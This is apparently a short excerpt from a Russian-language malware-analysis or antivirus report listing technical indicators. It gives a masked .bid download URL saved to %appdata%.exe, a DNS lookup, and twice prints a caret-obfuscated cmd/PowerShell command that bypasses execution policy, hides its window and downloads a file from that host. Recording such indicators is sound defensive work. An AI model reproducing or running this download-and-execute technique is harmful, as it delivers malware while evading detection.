Техническая информация
- http://as###itlecn.bid/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OWerSh^e^l^l.^eXE -EX^EcU^tIoNP^olIc^Y B^YPas^s -nO^Pr^of^il^E -^wi^ndows^ty^L^E^ hi^D^D^en (N^E^w-oBJ^eCt sysTEM.N^eT^.weBcLIE^nt)^.d^owN^loaDFi^lE(^'http://as###itlecn.bid/re...
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "p^OWerSh^e^l^l.^eXE -EX^EcU^tIoNP^olIc^Y B^YPas^s -nO^Pr^of^il^E -^wi^ndows^ty^L^E^ hi^D^D^en (N^E^w-oBJ^eCt sysTEM.N^eT^.weBcLIE^nt)^.d^owN^loaDFi^lE(^'http://as###itlecn.bid/re...' (со скрытым окном)